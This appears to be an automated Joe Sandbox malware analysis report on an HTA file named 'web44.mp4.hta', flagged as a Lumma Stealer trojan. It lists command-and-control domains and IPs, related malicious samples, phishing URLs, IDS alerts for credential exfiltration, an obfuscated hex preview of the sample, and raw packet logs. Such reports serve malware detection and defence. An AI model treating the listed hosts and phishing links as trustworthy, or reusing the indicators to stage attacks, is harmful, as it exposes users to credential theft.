http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000004.00000002.2908433712.0000000005227000.00000004.00000800.00020000.00000000.sdmp	false		high
https://noisercluch.click/apite	powershell.exe, 00000008.00000002.4458798218.0000000003529000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 00000004.00000002.2908433712.000000000613A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000004.00000002.2908433712.000000000613A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-net	powershell.exe, 00000004.00000002.2946159742.0000000007410000.00000004.08000000.00040000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000004.00000002.2908433712.0000000005227000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-neti	powershell.exe, 00000004.00000002.2946159742.0000000007410000.00000004.08000000.00040000.00000000.sdmp	false		high
https://stackoverflow.com/q/11564914/23354;	powershell.exe, 00000004.00000002.2946159742.0000000007410000.00000004.08000000.00040000.00000000.sdmp	false		high
https://stackoverflow.com/q/2152978/23354	powershell.exe, 00000004.00000002.2946159742.0000000007410000.00000004.08000000.00040000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000004.00000002.2908433712.000000000613A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000002.00000002.2134142607.0000000006289000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2908433712.000000000613A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pscore6lBjq	powershell.exe, 00000002.00000002.2132673786.0000000005221000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2908433712.00000000050D1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn1.k	powershell.exe, 00000002.00000002.2132673786.000000000537A000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000002.00000002.2132673786.0000000005221000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2908433712.00000000050D1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://noisercluch.click/W201.0	powershell.exe, 00000008.00000002.4461171399.00000000035BE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.96.3	noisercluch.click	European Union		13335	CLOUDFLARENETUS	true
172.67.154.95	cdn1.klipbazyxui.shop	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1582508
Start date and time:	2024-12-30 19:14:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 51s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	web44.mp4.hta
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winHTA@9/6@2/2
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 94% Number of executed functions: 219 Number of non-executed functions: 56
Cookbook Comments:	Found application associated with file extension: .hta Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 184.28.90.27, 4.175.87.197, 13.107.246.45
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target mshta.exe, PID 2180 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 6396 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: web44.mp4.hta

Simulations

Behavior and APIs

Time	Type	Description
13:14:59	API Interceptor	93x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.96.3	QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/u7ghXEYp/download
	CV_ Filipa Barbosa.exe	Get hash	malicious	FormBook	Browse	www.mffnow.info/1a34/
	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	www.mydreamdeal.click/1ag2/
	SWIFT COPY 0028_pdf.exe	Get hash	malicious	FormBook	Browse	www.questmatch.pro/ipd6/
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/I7fmQg9d/download
	need quotations.exe	Get hash	malicious	FormBook	Browse	www.rtpwslot888gol.sbs/jmkz/
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/Bh1Kj4RD/download
	http://kklk16.bsyo45ksda.top	Get hash	malicious	Unknown	Browse	kklk16.bsyo45ksda.top/favicon.ico
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/XrlEIxYp/download
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/XrlEIxYp/download

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
cdn1.klipbazyxui.shop	lumma.ps1	Get hash	malicious	LummaC	Browse	104.21.72.190
cdn1.klipbazyxui.shop	Winter.mp4.hta	Get hash	malicious	LummaC	Browse	104.21.72.190

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	setup.exe	Get hash	malicious	LummaC	Browse	172.67.208.58
	SharkHack.exe	Get hash	malicious	LummaC, DarkTortilla, LummaC Stealer, PureLog Stealer, zgRAT	Browse	104.21.64.143
	Active_Setup.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Set-up.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	#Setup.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	setup.msi	Get hash	malicious	Unknown	Browse	104.21.0.151
	https://employeeportal.net-login.com/XL0pFWEloTnBYUmM5TnBUSmVpbWxiSUpWb3BBL1lPY1hwYU5uYktNWkd5ME82bWJMcUhoRklFUWJiVmFOUi9uUS81dGZ4dnJZYkltK2NMZG5BV1pmbFhqMXNZcm1QeXBXTXI4R090NHo5NWhuL2l4TXdxNlY4VlZxWHVPNTdnc1M3aU4xWjhFTmJiTEJWVUYydWVqZjNPbnFkM3M5T0FNQ2lRL3EySjhvdVVDNzZ2UHJQb0xQdlhZbTZRPT0tLTJaT0Z2TlJ3S0NMTTZjc2ktLTZGNUIwRnVkbFRTTHR2dUFITkcxVFE9PQ==?cid=2341891188	Get hash	malicious	KnowBe4	Browse	104.17.25.14
	random.exe	Get hash	malicious	LummaC	Browse	104.21.64.143
	https://tepco-jp-lin;.%5Dshop/co/tepco	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://chase.com-onlinebanking.com/XWmJkMGsxak5lZzdVZUczR3RxTGFWN1g0Q2NKLy96RURPVEpZbEdkOC9nQzY1TStZSjU0T0x4Q05qOXZBRHZnZTZpMmh2eGFmSm9rcVRmV2xBeENiMEF1V3VTOVAvL2dKemVQZkZGNHAxQ1hqTU9WY0R5SGpYeDQ3UVNtNGZpWDJYdWxBUFY5OUFVc3VFU041aHl6aUxrMlBZaGs1Y25BV0xHL1Vhc1BYNVQ5d3laZ2piV3gvTjlUMmc3QWV4QUs2Q0h6Yi0tZ1lEV1pac1JHRzl5ZFpFaC0tcVVpc09xQzZsUzY0bzY0YWpuS1N2Zz09?cid=2342337857	Get hash	malicious	KnowBe4	Browse	104.18.87.62
CLOUDFLARENETUS	setup.exe	Get hash	malicious	LummaC	Browse	172.67.208.58
	SharkHack.exe	Get hash	malicious	LummaC, DarkTortilla, LummaC Stealer, PureLog Stealer, zgRAT	Browse	104.21.64.143
	Active_Setup.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Set-up.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	#Setup.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	setup.msi	Get hash	malicious	Unknown	Browse	104.21.0.151
	https://employeeportal.net-login.com/XL0pFWEloTnBYUmM5TnBUSmVpbWxiSUpWb3BBL1lPY1hwYU5uYktNWkd5ME82bWJMcUhoRklFUWJiVmFOUi9uUS81dGZ4dnJZYkltK2NMZG5BV1pmbFhqMXNZcm1QeXBXTXI4R090NHo5NWhuL2l4TXdxNlY4VlZxWHVPNTdnc1M3aU4xWjhFTmJiTEJWVUYydWVqZjNPbnFkM3M5T0FNQ2lRL3EySjhvdVVDNzZ2UHJQb0xQdlhZbTZRPT0tLTJaT0Z2TlJ3S0NMTTZjc2ktLTZGNUIwRnVkbFRTTHR2dUFITkcxVFE9PQ==?cid=2341891188	Get hash	malicious	KnowBe4	Browse	104.17.25.14
	random.exe	Get hash	malicious	LummaC	Browse	104.21.64.143
	https://tepco-jp-lin;.%5Dshop/co/tepco	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://chase.com-onlinebanking.com/XWmJkMGsxak5lZzdVZUczR3RxTGFWN1g0Q2NKLy96RURPVEpZbEdkOC9nQzY1TStZSjU0T0x4Q05qOXZBRHZnZTZpMmh2eGFmSm9rcVRmV2xBeENiMEF1V3VTOVAvL2dKemVQZkZGNHAxQ1hqTU9WY0R5SGpYeDQ3UVNtNGZpWDJYdWxBUFY5OUFVc3VFU041aHl6aUxrMlBZaGs1Y25BV0xHL1Vhc1BYNVQ5d3laZ2piV3gvTjlUMmc3QWV4QUs2Q0h6Yi0tZ1lEV1pac1JHRzl5ZFpFaC0tcVVpc09xQzZsUzY0bzY0YWpuS1N2Zz09?cid=2342337857	Get hash	malicious	KnowBe4	Browse	104.18.87.62

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	random.exe	Get hash	malicious	LummaC	Browse	172.67.154.95
	eXbhgU9.exe	Get hash	malicious	LummaC	Browse	172.67.154.95
	Supplier.bat	Get hash	malicious	Unknown	Browse	172.67.154.95
	Supplier.bat	Get hash	malicious	LodaRAT, XRed	Browse	172.67.154.95
	NEW-DRAWING-SHEET.bat	Get hash	malicious	Unknown	Browse	172.67.154.95
	Requested Documentation.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	172.67.154.95
	lumma.ps1	Get hash	malicious	LummaC	Browse	172.67.154.95
	GPU-Z.exe	Get hash	malicious	LummaC, DarkTortilla, LummaC Stealer	Browse	172.67.154.95
	Winter.mp4.hta	Get hash	malicious	LummaC	Browse	172.67.154.95
a0e9f5d64349fb13191bc781f81f42e1	setup.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	SharkHack.exe	Get hash	malicious	LummaC, DarkTortilla, LummaC Stealer, PureLog Stealer, zgRAT	Browse	188.114.96.3
	Active_Setup.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	Set-up.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	#Setup.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	random.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	UmotQ1qjLq.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	PI1EA8P74K.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	eXbhgU9.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	PO_KB#67897.cmd	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	188.114.96.3

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8003
Entropy (8bit):	4.840877972214509
Encrypted:	false
SSDEEP:	192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
MD5:	106D01F562D751E62B702803895E93E0
SHA1:	CBF19C2392BDFA8C2209F8534616CCA08EE01A92
SHA-256:	6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
SHA-512:	81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1328
Entropy (8bit):	5.428115002505582
Encrypted:	false
SSDEEP:	24:3K1yt4WSKco4KmM6GjKbmOIKo+mZ9tYs4RPQoUEJ0gt/NK3R8UHrg8g:sy+WSU4Yymp+mZ9tz4RIoUl8NWR8WNg
MD5:	F9B2AD9444FB3D2E5DD724E53AA623FF
SHA1:	0F11AC7AA1AC87C65019C4BE709265B8269E8680
SHA-256:	6AA015B0CEF0CF37147580EF31A199BB142CA502D9AB6523CD1C5456EF2FD16F
SHA-512:	C9DE9A317BFF0A9D7D3869C766EDFAF28161D18FDD35F7379EB101715D5CABF3BC9E0090231B2B62EB4BD791433CF9B793431FCE24CD544B93BE92131159DE29
Malicious:	false
Preview:	@...e.................................^..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bd2z3mf3.voi.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ewjdg22f.rzm.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jknak2fj.a3q.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yhrvd4o4.5xj.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:	data
Entropy (8bit):	6.1409274887174155
TrID:
File name:	web44.mp4.hta
File size:	532'339 bytes
MD5:	b775351f7a697d6deb1d440dc12d9761
SHA1:	b133d42502750817aa8e88119ff36158d2f8ecee
SHA256:	4baabdbe96a16716454a62abd7a7105d8b3a775c2428a0052d9738b0412a32c6
SHA512:	ae33dd3c3ccdc2cecd2740623459095b49f50b04a780dc3ddc79ac428eb3b246d426faf2f76a7735056bb13652e429641edccd5a6a7686c5016b8de0816060ac
SSDEEP:	6144:fX+cJ3StY8weNbeg18rnPJ6CLpwYnneBweuAe4Niqe3TGei:fX+cFUY8Y0
TLSH:	53B4AF465A77C611C8798D74EDD7C9282471BDCC480487AE4AFDB839208B1B8BED69FC
File Content Preview:	66K75y6eT63H74T69Q6ff6ez20a51B68k77g64E28v67f74s6df6fg29d7bR76Z61T72A20B4bn64M4eA62U4aQ3dR20t27s27B3bY66l6ff72q20V28u76L61e72T20e54y45C41R6dx79l43N20u3dJ20r30E3bx54j45r41x6dR79U43H20P3cL20i67I74I6dr6fe2eg6cJ65z6eC67J74m68S3bn20F54o45C41z6dV79O43O2bG2bW29I

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-30T19:16:27.797833+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49982	188.114.96.3	443	TCP
2024-12-30T19:16:28.296917+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49982	188.114.96.3	443	TCP
2024-12-30T19:16:28.296917+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49982	188.114.96.3	443	TCP
2024-12-30T19:16:28.872471+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49983	188.114.96.3	443	TCP
2024-12-30T19:16:29.323743+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	49983	188.114.96.3	443	TCP
2024-12-30T19:16:29.323743+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49983	188.114.96.3	443	TCP
2024-12-30T19:16:30.625473+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49984	188.114.96.3	443	TCP
2024-12-30T19:16:31.116182+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.5	49984	188.114.96.3	443	TCP
2024-12-30T19:16:31.592886+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49985	188.114.96.3	443	TCP
2024-12-30T19:16:32.693631+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49986	188.114.96.3	443	TCP
2024-12-30T19:17:42.486710+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49987	188.114.96.3	443	TCP
2024-12-30T19:17:50.124243+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.5	49987	188.114.96.3	443	TCP
2024-12-30T19:17:50.846432+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49988	188.114.96.3	443	TCP
2024-12-30T19:17:53.525128+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49989	188.114.96.3	443	TCP
2024-12-30T19:17:53.996594+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49989	188.114.96.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 30, 2024 19:15:08.491324902 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:08.491348028 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:08.491415024 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:08.497793913 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:08.497806072 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:08.969290018 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:08.969377041 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.015877008 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.015907049 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.016199112 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.026784897 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.071331978 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.445290089 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.445338011 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.445368052 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.445400000 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.445427895 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.445441008 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.445461035 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.445477009 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.445574045 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.445761919 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.446182966 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.446225882 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.446233034 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.451339960 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.451936007 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.451942921 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.531260967 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.531316996 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.531327963 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.534333944 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.534431934 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.534439087 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.540631056 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.540684938 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.540690899 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.548369884 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.548448086 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.548454046 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.572124004 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.572153091 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.572179079 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.572180986 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.572201014 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.572237015 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.572482109 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.572526932 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.572531939 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.572551966 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.572597980 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.572607994 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.579649925 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.579762936 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.579770088 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.584110022 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.584240913 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.584248066 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.620297909 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.620328903 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.620481014 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.620502949 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.621587992 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.626467943 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.631726980 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.631768942 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.631769896 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.631782055 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.631850004 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.637123108 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.650660038 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.650717020 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.650722980 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.650747061 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.650790930 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.650796890 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.650825977 CET	49709	443	192.168.2.5	172.67.154.95
